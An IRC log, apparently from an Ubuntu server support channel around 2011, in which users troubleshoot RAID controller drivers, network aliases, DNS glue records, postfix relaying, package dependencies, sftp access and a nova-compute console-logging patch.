<hydrogen18> ''sudo lsof | grep swarm' is blank
<twb> Dunno man
<twb> You can try forcing it
<hydrogen18> i don't think you can force an lv offline
<hydrogen18> yeah...restarted, now marked as #open 0
<hydrogen18> now im running a fsck on a 6.37 TiB filesystem...probably take all nite
<twb> Yeah so maybe don't make multi-TiB filesystems
<twb> And at least make them journalled or checksummed
<twb> People who use LVM and then lvextend --size 100% need to be LARTs
<twb> *LARTed
<hydrogen18> There do not seem to be many other ways to glue physical devices together
<twb> hydrogen18: well, I would hope that if you ahve that much data you have some kind of organization of it
<twb> so e.g. make /srv/porn/interracial and /srv/porn/milfs separate LVs
<Solaris444> does anybody know if 10.04 LTS server has native support for the LSI MegaRAID 9260-4i RAID controller?
<qman__> Solaris444, I don't know, but it's pretty simple to get the answer to
<qman__> find out what driver that card needs, what kernel version it was added in, and compare to the current lucid kernel version
<Solaris444> Yes, I've tried to do that and can't get a straight answer.
<Solaris444> LSI don't tell you on their website.
<Solaris444> It just says "native support is included in some newer linux kernels, but we don't support it.  Use our driver here"
<Solaris444> which is no help at all.
<qman__> download the driver and find out what the name is
<Solaris444> I've even contacted LSI directly and still couldn't get a straight answer.
<qman__> then see if it's in the lucid kernel or modules
<Solaris444> the kernel module is megaraid_sas
<Solaris444> Which I believe is included, but the question is whether it supports that specific card.
<qman__> well surely it should have a version or date
<Solaris444> You would think so...
<Solaris444> ok apparently the version on their website is 00.00.04.37
<qman__> well, what I can tell you is the module on my file server is version 00.00.04.01
<Solaris444> but that doesn't mean that was the first version of the driver to include support.
<Solaris444> that's just the current version.
<qman__> granted I haven't updated the kernel in a couple months
<Solaris444> Well let me put it this way...
<Solaris444> If I use the kernel module from their website...
<Solaris444> I can't EVER update the kernel on the ubuntu box can i.
<qman__> this should be helpful: http://lxr.free-electrons.com/source/Documentation/scsi/ChangeLog.megaraid_sas?v=2.6.32
<Solaris444> incidentally, what kernel version are you running?
<Solaris444> thankyou, reading now.
<qman__> might be hard to find it in there, but that's the complete changelog
<qman__> if you can find out where in it support was added, that will answer your question
<qman__> currently running 2.6.32-32
<Solaris444> I think the 9260 is a new generation controller.
<qman__> that link is to my version, but it has links to all the others
<Solaris444> hello hello, check this out
<Solaris444> https://bugs.launchpad.net/ubuntu/+source/linux/+bug/546091
<uvirtbot> Launchpad bug 546091 in linux "10.04 Installer doesn't properly detect 9240 MegaRaid SAS Controlers " [Medium,Fix released]
<Solaris444> looks like there was a bug but it appears to have been fixed in 2.6.32-26
<qman__> lucky find
<qman__> that confirms it
<Solaris444> question though... if I *were* to use the kernel module on lsi's website...
<Solaris444> I can't ever update the kernel, correct?
<qman__> it would have to be recompiled with every update
<qman__> and running production with kernel sources and compilers installed can be considered risky
<qman__> Back in the Day (tm) I used to have to do that to run decent versions of nvidia drivers on my desktop
<qman__> it was a bit of a nuisance in that case, can't imagine running a server that way
<Solaris444> yeah, that's what i mean.  if I apply the kernel update, I'd have to recompile *prior* to rebooting, correct?
<qman__> yes
<qman__> well, prior to booting the new kernel
<Solaris444> That's a really bad idea on a production mail server.
<qman__> which it will try to do by default
<qman__> and fail because of
<Solaris444> right
<qman__> you could always hack together some scripts to do it for you
<qman__> but we all know how that goes
<qman__> something that delicate would surely have just as many problems for a while
<Solaris444> agreed.
<Solaris444> unfortunately the final post in the bug claims it *isn't* fixed for the specific card the bug reporter has.
<Solaris444> though it's newer than the reported card.
<qman__> well, that kernel version is pretty old at this point, too
<Solaris444> yeah, so i see.
<qman__> there's been another re-roll of the disc since then, too
<Solaris444> what version is the disc at now?
<qman__> 10.04.3
<qman__> not sure which kernel version is on the disc
<qman__> my K6 is running 2.6.32-28 and claims 10.04.3, but that's also running the -386 kernel, and I don't know if it can claim minor version status without a kernel update
<Solaris444> *nods*
<Solaris444> I understand.
<qman__> none of my servers are were actually new lucid installs, I upgraded them from hardy
<qman__> so I could be dragging some baggage
<twb> 13:06 <Solaris444> does anybody know if 10.04 LTS server has native support for the LSI MegaRAID 9260-4i RAID controller?
<twb> Solaris444: does it show up as in lspci?
<Solaris444> I don't have the system yet.
<Solaris444> I won't purchase it if it doesn't.
<twb> OK.  Well, if it's hardware raid, it will not matter because ubuntu will just see a disk (the virtual disk)
<Solaris444> ?
<Solaris444> It's a hardware raid card, but it still needs drivers...
<twb> However if you want to be able to configure LSI while ubuntu is running, i.e. without rebooting into the BIOS, then you will need stupid userland tools, and they can be made to go but they're horrible and painful.
<Solaris444> Booting into BIOS is fine.
<Solaris444> I mean, if the array were to lose a disk, I'd take the system offline to do it anyway.
<twb> Then I *think* it'll be fine, but I would still recommend using md RAID instead unless you definitely need the extra throughput
<twb> Also you will want to buy a spare card in case the first one dies
<Solaris444> But I did see a bug filed against 10.04 which claimed that some cards were not able to see the attached disks.
<Solaris444> spare card?
<Solaris444> that's a bit extreme isn't it?
<uvirtbot> New bug: #862969 in nova "--logfile_mode flag does not properly set logfile permissions" [Undecided,New] https://launchpad.net/bugs/862969
<idlemind324> hey. i have 5 static ips and i am setting up a router box if i assign 1 of the ip addresses in my range only traffic for that single address comes through. how do i tell it to listen for the whole range?
<twb> Solaris444: if your one card dies, and you can't buy a replacement because they're not made anymore, then all your data is gone
<twb> Solaris444: hardware RAID cards are not interchangable, whereas md RAID you are fine as long as you have a new enough Linux kernel on your rescue system
<Solaris444> true.
<Solaris444> performance isn't as good of course.
<twb> Correct
<twb> But if it's just for an office's word documents and stuff, it doesn't matter
<twb> If it's the database server for, say, nintendo.com or ASX, that's different.
<SpamapS> idlemind324: you need to assign the addresses as aliases in /etc/network/interfaces
<idlemind324> spamaps: i can't do it through some kind of iptables rule? how is it done on cisco appliances and things of that nature?
<SpamapS> idlemind324: no you can't because you need it to respond to arp requests
<SpamapS> idlemind324: cisco appliances would also assign the addresses to the interface
<idlemind324> k i'm tossing on aliases atm 1 sec
<SpamapS> idlemind324: just make another interface..   eth0:1 .. eth0:2 .. with the address/netmask/broadcast
<SpamapS> idlemind324: make sure its marked as 'auto' too so its brought up at boot time
<idlemind324> for the aliases i shouldn't enter a gateway for them right?
<idlemind324> ok made them aliases but i can't ping any of the alias addresses from an outside server but i can ping the ip i gave the physical interface
<idlemind324> do i need to assign mac addresses to each alias?
<twb> eth0:1 is ifconfig failspeak
<twb> ip is where it's at
<twb> http://paste.debian.net/133151/
<SpamapS> twb: how exactly does that translate to /etc/network/interfaces ?
<twb> SpamapS: you put it in interfaces(5)
<twb> That paste I showed, that was straight out of /etc/network/interfaces
<SpamapS> unmanaged inet manual .. hehe.. interesting
<SpamapS> twb: have never seen that before
<twb> "unmanaged" is instead of "eth0"
<SpamapS> twb: the part I've not seen is manual setup..
<twb> You can name your ifaces logically in /etc/udev/70-persistent-net.rules -- this is very useful when writing an /etc/iptab (firewall), because it means you don't need to use variables and thus don't need m4 or cpp or sh
<SpamapS> seems more BSD-like. :)
<twb> manual is just instead of static, so we can use ip instead of ifupdown's shitty old ifconfig
<twb> ifupdown is written in noweb FFS
<SpamapS> I know
<SpamapS> its a nightmare
<SpamapS> been digging around in it this release
<Solaris444> twb it's a mail and file server for a graphical design company
<idlemind324> http://paste.debian.net/133152/
<twb> Solaris444: shrug
<idlemind324> ^^ thoughts on why eth0:1 isn't working
<uvirtbot> idlemind324: Error: "^" is not a valid command.
<twb> SpamapS: IMO it should be just rewritten from the ground up to be less stupid
<SpamapS> twb: would you be willing to write that up for the server guide? seriously, much nicer
<twb> SpamapS: but knowing canonical they will probably fold it into systemd or something
<SpamapS> twb: systemd.. who said anything about systemd?
<SpamapS> <--- Canonical :)
<twb> Yes, but you lost all your upstart people
<twb> to google or systemd, AFAICT
<SpamapS> <--- upstart person
<twb> OK, whatever
<SpamapS> jhunt would be crushed to know that we lost him too
<SpamapS> twb: upstart is, AFAIK, still the pid 1 for chromeos
<SpamapS> twb: and we've already stated repeatedly that upstart isn't going anywhere before 12.04.
<twb> OK, whatever
<SpamapS> <-- sensitive about that
<SpamapS> But yeah, ifupdown is crap and I'd love to replace it with something simpler.
<twb> FWIW I'm sick of both upstart and systemd
<SpamapS> I think the way we introduced upstart was a bit manic.. WAY too much explicit event listing for things that should all just start on runlevel 2.
<SpamapS> And the shutdown.. makes me sad.
<twb> I want some determinism and better debugging
<twb> Last time I looked if your system hung during boot because mountall got its knickers twisted, you could eitehr get no debugging, or pass --verbose which made upstart emit thousands of lines a second and you can't read them before they scroll offscreen, AND they aren't written to printk so you can't see them by modprobing netconsole before pivot_root
<twb> I don't really care about stuff like "but what if you want to suspend the system, go home, plug into a new network, and have stuff work" -- because I don't DO that with my rack full of servers
<idlemind324> o wait give it a few minutes and tada the alias addresses start workin
<SpamapS> twb: actually they are written to printk as of 1.3
<twb> not in lts tho
<SpamapS> Yeah, hopefully we won't have to make so many apologies for 12.04. ;)
<twb> I'm sure you have been working hard to introduce new and exciting problems tho :P
<SpamapS> Indeed, I think we call that "progress"
<twb> I did an upgrade of my sid netbook the other day, and bluez, sudo and fbi were all broken
<twb> twb SMASH!
<twb> IIRC, d-i won't let you create a user called "admin"
<twb> Why is this?  The user/group doesn't seem to exist in the static 0..100 area
<_ruben> because it'd create a group admin, which is 'default'
<_ruben> iirc
<twb> But I can't see one in /etc/group either
<twb> There is an "adm" but that's different
<_ruben> i have admin on mine
<twb> What gid ?
<_ruben> probably created by some app .. it's 113
<twb> OK, I will grep over the postinsts in my package mirror to see if I can find it
<twb> Actually, can you save me a shitload of un-ar'ing and fgrep admin /var/lib/dpkg/info/*.p* for me?
<_ruben> doesn't yield much useful stuff
<twb> Mmm, I'm seeing that
<twb> I did find a box with that group
<twb> WTF, coworker is suggesting sudo
<twb> Which I might not see because I'm using sudo-ldap...
<twb> 113 and 116 seem too high for sudo tho
<twb> Given sudo is installed quite early typically
<twb> I reckon it's samba
<_ruben> no samba on the box i checked
<twb> it's always the group right after samba
<twb> sambashare that is
<_ruben> here it's after snmp
<twb> OK
<_ruben> both start with s... interesting? :)
<_ruben> sudo follows rather closely ;)
<_ruben> but doesnt seem to do it in postinst
<twb> The sudo guess is that in our sudoers, we have both %sudo and %admin
<_ruben> same here, but when looking at postinst, i only see it create sudo
<twb> Oh well, I'm going to <beer> now, so don't stress over it
<_ruben> Didn't intent to ;)
<koolhead17> hi all
<osmosis> my /boot is almost full. How do I remove unused kernels?
<_ruben> just like you would any other package
<bigjools> has anyone experienced an empty resolv.conf when using a static network interface in oneiric?
<ikonia> bigjools: did you define the name serves in the static network ?
<bigjools> yep
<bigjools> this was working in natty until I upgraded to oneiric
<ikonia> bigjools: if you try to look things up does it actually work ?
<bigjools> no
<ikonia> you set it up in gnome-network-maanger I assume ?
<bigjools> not until I manually edit resolv.conf (which is wiped at next book)
<bigjools> no, I edited /etc/network/interfaces
<ikonia> why are you setting it there and not in gnome-network-manager ?
<ikonia> have you disabled gnome-network-manager if you're using the interface file ?
<bigjools> because I don't have  gnome-network-manager
<ikonia> bigjools: what desktop are you using ?
<bigjools> this is the server channel, right? :)
<ikonia> my god, yes, so it is. I thought you where in #ubuntu+1 as you where talking about 11.10
<bigjools> :)
<ikonia> can you paste your interfaces file for me please (pastebin_)
<bigjools> ikonia: http://pastebin.ubuntu.com/699610/
<ikonia> thanks, one moment
<ikonia> ok, have to be honest, never seen dns-nameservers or dns-search set in interfaces file
<ikonia> I'd honestly remove that, and just put them in /etc/resolv.conf
<ikonia> also see if you have network-manager installed (dpkg -l | grep network-manager_)
<ikonia> (without the _ )
<bigjools> I do, it seems
<ikonia> maybe worth removing it, seeing as you're not using it
<ikonia> (remove any potentialy issue)
<bigjools> indeed, thanks for the advice
<bigjools> I guess something changed in oneiric's n-m
<ikonia> either that or the upgrade just enabled it
<ikonia> and it wasn't enabled in your natty box
<ersi> I have both dns-nameservers and dns-search in my interfaces file. Works great.
<ersi> Oh, it won't work in Oneiric?
<bigjools> seems that way
<bigjools> maybe the directives changed
<ersi> Or maybe you don't have resolveconf installed anymore
<koolhead17> zul: i can see keystone.conf finally but its still broken and now there is no keystone manpage
<rbasak> Should https://bugs.launchpad.net/ubuntu/+source/postfix/+bug/862915 be Importance: Medium? I've just set it to Low.
<uvirtbot> Launchpad bug 862915 in postfix "package postfix 2.8.2-1ubuntu2.1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 75" [Low,Triaged]
<rbasak> To answer my own question, it just occurred to me that no, it has an easy workaround so that's Low by definition.
<koolhead17> hey kirkland
<ersi> rbasak: Indeed :)
<kirkland> koolhead17: hi
<Dulcin> Hi, I just installed postfix on ubuntu 11 server and I only want to use it to send mails with php. Can anyone give me some hints on how to make sure that nobody else can use the mailserver?
<Dulcin> I read a little about SMTP Auth with postfix, but I'm not sure if this is required since I do not want users to have access at all
<koolhead17> Dulcin: are other users on same system has ssh access?
<Dulcin> yeah they do
<Dulcin> but I dont care, those are only admins
<Dulcin> basically I have a webserver, and it needs to send e-mails automatically
<Dulcin> but it has to be secure, so nobody else should be able to use the smtp server
<pmatulis> Dulcin: do not accept local mail (no local mail delivery) and do not accept to relay (see relay_domains)
<pmatulis> Dulcin: see the official postfix documentation, it's not hard
<Dulcin> Yeah I started reading that, but then I realised it was to securing authorized users only, so I got confused
<Dulcin> as I didn't want any users :)
<Dulcin> Ill check those points you mentioned and skim through the documentation a bit more to see if I can find what I need then
<pmatulis> Dulcin: but you're supposed to always accept for postmaster and MAIL_DAEMON users (according to standards)...
<Dulcin> I'm really new to this, so I can only guess what that means at this point :)
<Dulcin> but I'll read through the postfix docs
<Dulcin> I was reading this: http://www.postfix.org/SASL_README.html
<john> i need some help i want logmein-hamachi on my server but it complains about lsd-core and i cant get it or even lsd-base
<john> shadowdragon@ShadowDragonDen:~$ sudo dpkg -i logmein-hamachi_2.1.0.17-1_i386.deb
<john> (Reading database ... 57941 files and directories currently installed.)
<john> Preparing to replace logmein-hamachi 2.1.0.17-1 (using logmein-hamachi_2.1.0.17-1_i386.deb) ...
<john> Unpacking replacement logmein-hamachi ...
<john> dpkg: dependency problems prevent configuration of logmein-hamachi:
<john>  logmein-hamachi depends on lsb-core (>= 3.0); however:
<john>   Package lsb-core is not installed.
<john> dpkg: error processing logmein-hamachi (--install):
<john>  dependency problems - leaving unconfigured
<john> Processing triggers for ureadahead ...
<john> ureadahead will be reprofiled on next reboot
<john> Errors were encountered while processing:
<john>  logmein-hamachi
<john> any one can help me figure this oen out?
<john> one*
<jussi> !pastebin | john
<ubottu> john: For posting multi-line texts into the channel, please use http://paste.ubuntu.com | To post !screenshots use http://imagebin.org/?page=add | !pastebinit to paste directly from command line | Make sure you give us the URL for your paste - see also the channel topic.
<jussi> john: but it looks like you need to do: sudo apt-get install lsb-core
<john> tried that and sorry ill try to use pastebin next time
<john> logmein works on my desktop but try to install it on my server i just set up tonight and it gives me that problem
<john> and wont let me get lsb-core for some reason
<john> oh and after i run dpkg to isntall the deb file or use apt to it constantly shows me logmein needs lsb core
<john> i cant do any thing with apt
<pmatulis> john: so install lsb-core
<pmatulis> john: what happens when you try?
<john> http://paste.ubuntu.com/699716/
<pmatulis> john: what release is this?
<john> ubuntu server natty 32bit
<pmatulis> john: maybe pastebin /etc/apt/sources.list
<john> ok here it is http://paste.ubuntu.com/699719/
<pmatulis> john: did you try 'sudo apt-get -f install' ?
<john> yep still nothing
<pmatulis> john: what was it's output?
<john> hmm i guess i should have tried it whout the lsb-core and stuff
<john> couse now its downloading things
<pmatulis> john: right
<john> kinda new to the server thing i have only used ubuntu for about two years now
<janimo> do the server developers using the ac100 arm netbook want some specific options present in the oneiric kernel? (DM, RAID, other things which normally would not make sense on such a machine)
<john> there we go now its working thanks for being patient with me
<pmatulis> john: k, keep on truck'n
<janimo> ogra_, do you know which specific kernel devs have ac100 so I can ask them directly?
<janimo> s/kernel/server/
<ogra_> janimo, hallyn_, Daviey and zul i think
<ogra_> there might be more i dont know about
<zul> good morning
<zul> janimo: yes :)
<rbasak> zul, I was going to send you a patch/review request for my nova-compute patch but found that you've already done it. Did you base it on patch set 1 or 2 from gerrit, or did you get it from somewhere else? There are bugs in patch set 1, patch set 2 is the one I'm happy with.
<rbasak> Also patch set 2 includes restarting the logger on nova-compute restart
<zul> rbasak: im going to take patch set 2
<rbasak> OK cool
<rbasak> Two things that I haven't figured out how to test: rescue mode and live migration. But all the tests pass on patch set 2.
<zul> rbasak: i need to update my lxc console patch but i found a problem with the lxc console patch yesterday to use console.fifo so that will be uploaded today after i figure it out
<zul> k cool
<rbasak> Also, it seems that if nova-compute is stopped while a guest dumps >64k to the console then the guest hangs
<rbasak> If it dumps less than the logger picks it up out of the fifo buffer and it continues fine
<rbasak> s/than/then
<smoser> rbasak, so are you going to add ring buffer support to kvm next cycle ?
<rbasak> smoser: yeah, that does seem like a better way to do it
<rbasak> smoser: assuming everyone can agree on a ring buffer format, and libvirt will need to have support added too
<smoser> the guest hangs ?
<smoser> as in writes to /dev/ttyS0 hang
<smoser> right?
<rbasak> no, it seemed to hang the guest completely
<rbasak> I need to retest to verify that
<smoser> (not every one needs to agree, someone needs to do it, and thell others this is how it is!)
<rbasak> in case it was something else that caused it
<zul> smoser: lxc? or something else
<smoser> it would seem strange to me that a write to a bit of hardware should stop the cpu for a machine.
<rbasak> well the ringbuffer format I've implemented is how it is :-)
<smoser> :)
<smoser> rbasak, i agree.
<rbasak> I think qemu might be assuming that the fifo reader never disappears
<rbasak> I really should retest to verify though
<smoser> zul, what issue did you have with your lxc console ?
<KM0201> anyone know how to resolve thjis, trying to SSH my server, getting this error message on my client..   Warning: Permanently added '192.168.1.7' (RSA) to the list of known hosts.
<KM0201> Permission denied (publickey).  (.7 is an ubuntu client... but i dont' know what file to modify to fix this)
<smoser> you're getting permission denied, KM0201 . the other side of the connection is not letting you in.
<KM0201> oh ok... hmm.. so this is a server prob, right?
<smoser> the warning is telling you that the client system has seen this fingerprint of this server before, and so it is adding it.
<smoser> KM0201, it would seem to be yes.
<zul> smoser: that it displayed the console output in the log file rather than the command output
<KM0201> ok.
<smoser> KM0201, or your client isn't using the right key that you have configured.
<KM0201> well, i completley purged ssh on the client, and still had the issue.
<smoser> one way or another, 'ssh -v <host>' and logs on the server will tell you more.  the server doesn't tell clients why they cant connect.
<smoser> zul, i dont follow.
<KM0201> smoser: gotcha, thanks
<zul> smoser: well when i run euca-get-console-output it displays nothing on the cli but it spews everything into the /var/log/nova/nova-compute.log
<smoser> zul, well, it always does that.
<smoser> stupidly, but with debug on user-data gets written to that log.
<zul> smoser: anyways ill figure it out
<smoser> er... s/user-data/console-output/
<zul> smoser: this is what i mean: http://pastebin.ubuntu.com/699744/
<smoser> it writes the word logfile.
<smoser> nice
<zul> anyways ill figure it out ;)
<janimo> zul, yes as in DM/RAID needed on ? Any other configs?
<zul> janimo: yes as in dm/raid needed...i would have a look at the linux-server config
<qman__> I'm having a DNS problem. I'm trying to decommission one DNS server, and move a bunch of domains to the new one. The problem is, even though I have changed the IPs of my nameserver records, people are still asking the old one, weeks later. What am I missing? How can I find out?
<pmatulis> qman__: dhcpd not updated?
<patdk-wk> qman__, did you update your nameservers with your register for all those domains?
<rbasak> qman__: you may need to change the zone on your old server to respond with the new NS records. Also try http://www.squish.net/dnscheck to check you've got everything set up correctly. I'm not sure where the right place to ask though, not sure that this channel is the right place.
<patdk-wk> nothing like bad dns glue :)
<qman__> I didn't change anything on the registrars, but the domains use 'ns1.mydomain.com' and 'ns2.mydomain.com'. I changed the A records for those to the new IP
<patdk-wk> doesn't matter
<patdk-wk> you own mydomain.com?
<qman__> that's not the actual domain, sorry
<qman__> I forgot that's a real site
<patdk-wk> don't use other peoples domains as your own
<qman__> what I meant was literally my domain
<patdk-wk> doesn't matter
<patdk-wk> glue has to exist somewhere
<patdk-wk> and unless the glue is updated, it won't go to your dns servers
<patdk-wk> everytime you change a dns server ip
<patdk-wk> you have to login to the register of that domain and update the glue
<patdk-wk> for the dns server domain name you use
<patdk-wk> and that change can take 48hours (though normally only takes a few)
<qman__> ah, ok
<qman__> so I was missing a key step, thanks
<john> here is a question with ubuntu natty server is there a way to make it auto login so i can have it launch somthing like a game server program
<patdk-wk> john, isn't that what init.d? upstart? or even rc.local is for? :)
<patdk-wk> hell, you could even use cron @reboot
<john> rc.local wont run it
<john> it seems like it dont want to work untill after every thing is loaded
<patdk-wk> if it won't run it, that program is evil, and probably needs env thing set
<slestak> hi guys.  anyone using the tmux package from the repo?
<qman__> many game servers will only run interactive
<patdk-wk> john, then add a sleep to it
<slestak> I am getting a create session error.  Googleing gives me some leads but nothing ubuntu specific
<qman__> I ran into this problem before, wrote up an init script which used screen
<patdk-wk> qman__, true, but that is a fault of the person attempting to daemonize it, not the app itself really
<patdk-wk> I mean, it's evil of the app, but can easily be worked around
<john> qman how did you get it to work or did you
<qman__> john, created a user to run it as, then put together a couple scripts
<patdk-wk> john it probably wants to bind to a pty, and normally that doesn't exist except with a real console
<qman__> I can pastebin those scripts for you but I have to look them over first
 * patdk-wk remembers pty hell of using ssh from inside a freebsd jail
<john> alright qman that could help I'm just trying to get it to be as automated as posible  this is my first server and its a dedicated minecraft  server for a start
<qman__> if I run 'dig glue domain.com', and it resolves correctly, does that mean glue records aren't the problem?
<patdk-wk> your using other peoples domains again?
<patdk-wk> what is the problem ns server?
<patdk-wk> and problem domain?
<qman__> about 50 domains, the main domain is trsys.com
<qman__> I inherited a mess, and I've never done this before, the domains are on several different registrars
<patdk-wk> I am not getting any glue :(
<patdk-wk> strange
<qman__> I think I found it
<patdk-wk> sometimes I get a 216.x ip, and sometimes a 184.x ip
<patdk-wk> from the same dns server
<qman__> 184 is the new one, 216 is the old one that's supposed to be going away
<patdk-wk> maybe some of the root servers are lagging in their updates
<qman__> john, this is the script I made up for srcds:
<qman__> http://pastebin.com/SM4KJTdV
<lynxman> morning everyone o/
<qman__> some details you'll need, srcds is the user it runs as, ryan is my user so I can screen, and /home/srcds/srcds.sh is a script which runs the game server itself
<iuytfr> hellot
<iuytfr> anyone there
<qman__> !anyone | iuytfr
<ubottu> iuytfr: A high percentage of the first questions asked in this channel start with "Does anyone/anybody..." Why not ask your next question (the real one) and find out? See also !details, !gq, and !poll.
<iuytfr> who know if there is someone there ?
<iuytfr> well
<iuytfr> how to perform a complete hard disk check up ?
<qman__> iuytfr, you can monitor hard disk SMART information with smartctl, part of the smartmontools package
<zul> rbasak: whats the difference between the two patches?
<reya276> How can I fix this issue http://pastebin.com/Z5pDBGNS ?
<rbasak> zul: I've added tests, fixed some existing test failures (including a bug) and added restart of logging on nova-compute restart
<zul> k
<rbasak> Oh, and i8n in the RingBuffer error messages
<iuytfr> i just installed smartmontools
<iuytfr> what i have to do now ?
<qman__> iuytfr, sudo smartctl -a /dev/sd?   where sd? is your drive name
<qman__> read the manual for more options and details
<reya276> How can I fix this error http://pastebin.com/Z5pDBGNS ?
<reya276> for some reason mysql wont start
<reya276> in the mysql channel I was told it was an Upstart issue
<koolhead17> kim0: around?
<kim0> koolhead17: yep
<reya276> ok I figured out the cause of the error, is not upstart http://pastebin.com/xfpzJkh7
<ersi> reya276: most common thing to forget when moving stuff from the default locations ;) (I've done that as well)
<uvirtbot> New bug: #863330 in mysql-5.1 (main) "Link to Copyright File is Broken" [Undecided,New] https://launchpad.net/bugs/863330
<reya276> ersi, what is the thing I forgot?
<reya276> ersi, I doubt that this is the issue, right now mysql wont start because it can't write to the new directories and I have chown it already but nothing
<ersi> permissions
<ersi> Your permissions are still wrong, or something else is prohibiting it from writing there
<ersi> ls -l / and check the file permissions on /Data
<CallidusDragon> ahh this is the one I wanted
<CallidusDragon> Hello. is anyone around?
<ikonia> yes
<CallidusDragon> Im having some troubles with my home server. Cant get use to using ssh
<CallidusDragon> its not that im command line inept, its simply that im slow as hell using it. I also have no clue to do basic things like download files (or transfer from my home comp for that matter)
<ikonia> so what's your actual question ?
<KM0201> probably wants a webui
<CallidusDragon> would be usefull
<KM0201> CallidusDragon: how often do you need to ssh a home server though?
<CallidusDragon> .... multiple locations
<KM0201> once it's all set up and configured, you shouldn't really ever need to
<CallidusDragon> no direct hardware access
<CallidusDragon> and im on my setup phase
<ikonia> CallidusDragon: do you have a question, yes or no
<CallidusDragon> Well considering the response I am getting, no.
<KM0201> CallidusDragon: so your problem is, you type slow... and this is taking forever, or what
<ikonia> CallidusDragon: you are rambling in #ubuntu and you're not really asking a question in here, it's quite frustrating as people give their time to help
<ikonia> if you actually need help - ASK a question detailing your problem
<CallidusDragon> I understand, however I am trying to form a question. And i dont see anyone else begging for help.
<CallidusDragon> I have to configure my server to use ftp and its frustrating
<ikonia> CallidusDragon: so form the question
<CallidusDragon> id much rather have a gui and use other tools.
<ikonia> CallidusDragon: ok, so you want to use FTP.
<CallidusDragon> sftp in particular
<KM0201> CallidusDragon: vsftpd is very easy to set up
<ikonia> CallidusDragon: have you installed an ftp daemon yet ?
<ikonia> ok, sftp is part of ssh
<CallidusDragon> Define easy.
<ikonia> CallidusDragon: have you fot ssh installed ?
<ikonia> CallidusDragon: you don't want an ftp daemon
<ikonia> you want to use sftp as you've said which is part of ssh
<CallidusDragon> COnsidering i dont know what fot ssh is, no.
<ikonia> have you got ssh installed on the server, yes/no
<CallidusDragon> I believe so.
<ikonia> CallidusDragon: ok, do you know how to install software from the package manager ?
<CallidusDragon> yes
<jpds> CallidusDragon: So you have sftp already set up.
<CallidusDragon> then what is the command?
<ikonia> CallidusDragon: ok, install the package "openssh-server" just to be sure
<CallidusDragon> ive been using my ssh connection through putty for a week now.
<ikonia> CallidusDragon: let me know when you've installed it/confirmed it's installed
<CallidusDragon> I have an ssh server
<ikonia> CallidusDragon: ok, so you should be able to sftp to that machine
<CallidusDragon> I dont know how is the problem
<ikonia> jpds: is the sftp line commented out by dwefadefault ?
<ikonia> default
<jpds> ikonia: No.
<ikonia> (I don't have an ubuntu server to confirm)
<ikonia> CallidusDragon: ok, so what's the issue when you try to sftp
<ikonia> CallidusDragon: do you get an error/warning/issue
<CallidusDragon> pull it back. How do enable an sftp session?
<ikonia> CallidusDragon: it's already enabled by default
<jpds> CallidusDragon: "sftp $IPADDRESS" is all I have to do.
<ikonia> CallidusDragon: hence why we are asking you try it and report back
<bastidrazor> sftp and scp are the same?
<CallidusDragon> Scp was annoying as hell
<CallidusDragon> i had to transfer 12 files
<ikonia> CallidusDragon: focus
<ikonia> FOCUS
<ikonia> CallidusDragon: can you please try sftp and report back
<CallidusDragon> ....
<CallidusDragon> I dont know the syntax to use the command
<ikonia> CallidusDragon: sftp ip.address
<ikonia> as jpds suggested
<ikonia> CallidusDragon: I believe putty installs an sftp client by default
<ikonia> CallidusDragon: it's called "psftp"
<ikonia> CallidusDragon: it's in the same location as your putty command
<CallidusDragon> one second
<CallidusDragon> I dont use putty as a command
<CallidusDragon> im on a windows machine.
<ikonia> putty IS a command
<ikonia> it's in C:\program files\Putty
<CallidusDragon> putty is a .exe
<idlemind324> ahh run he said the naughty word c:\
<ikonia> CallidusDragon: correct,
<ikonia> CallidusDragon: so is psftp
<ikonia> CallidusDragon: it's in the same pyscial location as putty.exe
<rbasak> zul, smoser, soren_: yeah, if nova-compute isn't running when a guest dumps more than about 64k to /dev/console, the guest freezes and when I restart nova-compute it can't seem to do anything. That's pretty bad.
 * CallidusDragon sighs
<CallidusDragon> now i need to remove the rsa key fingerprint for the server. I tried sftping into itself
<CallidusDragon> great.
<ikonia> CallidusDragon: focus,
<bastidrazor> there is 'winscp' that allows graphical copy paste to a server.
<ikonia> CallidusDragon: no you don't
<ikonia> CallidusDragon: just run the command psftp $ip-address
<CallidusDragon> I am attempting to locate putty
<ikonia> it's in c:\program files\putty
<KM0201> if this is such an issue, why not just install an FTP client, and use filezilla to download/install files?
<KM0201> sorry, download/upload
<ikonia> KM0201: please - one thing at a time
<CallidusDragon> it is not btw.
<KM0201> ikonia: i understand, just syaing, if his issue is typing commands, then help him get around his issue... i dunno.. just doesn't make any sense how this is being handled
<ikonia> CallidusDragon: then find it and come back to us
<CallidusDragon> that is what im doing
<zul> rbasak: so no to your patch?
<rbasak> zul: well it's a trade off - that's the catch with my patch but I don't see a better way. The patch is better than the previous vulnerability IMO, given that nova-compute will generally stay up and restarts will be quick
<zul> rbasak: ok ill leave it as it is
<rbasak> zul: other options are the ones I said in the gerrit comment - but none are that simple. I suppose the simplest workaround would be to spawn off processes instead of threads
<rbasak> (so they can outlive nova-compute)
<rbasak> Daviey: ^^ - any comment?
<Daviey> rbasak: give me 20 mins?
<rbasak> np
<KM0201> what's a good music player that can play a playlist from my server?
<KM0201> movies, i just play them one by one w/ vlc.. music that won't work
<CallidusDragon> What is the default install path for software?
<CallidusDragon> ikonia im sorry you were less than helpfull
<CallidusDragon> My issue was solved
<CallidusDragon> it created a new one in the process im attemting to fix
<ikonia> thats fine. Good luck then
<uvirtbot> New bug: #863305 in nova "Image access control is available" [Undecided,New] https://launchpad.net/bugs/863305
<Daviey> rbasak: Spawning off processes from threads, seems kinda scary in this case, no?
<rbasak> Daviey: I would drop the thread use, spawn off one process for each machine whose responsibility it is to create a pid file in the instance directory and then do the fifo reading/ringbuffer writing. The nova-compute process would be able to read directly from the ringbuffer fine (perhaps with an flock). It would be able to kill the reader/writer process by looking for the pid file.
<rbasak> On nova-compute restart it wouldn't have to do anything
<rbasak> Perhaps it should check for pid files and spawn processes for missing ones though
<Daviey> rbasak: Catching up on the comments
<Daviey> rbasak: I'd quite like soren's opinion TBH.
<Daviey> Considering he has been following it from the start.
<Daviey> I'm not convinced too many filehandles is a concern TBH.
<rbasak> which one's soren?
<Daviey> rbasak: soren_ is soren_
<Daviey> He hasn't commented on the review yet
<rbasak> which opinion are you referring to?
<rbasak> Oh
<rbasak> You'd like his opinion, OK.
 * rbasak should learn to read
<Daviey> :)
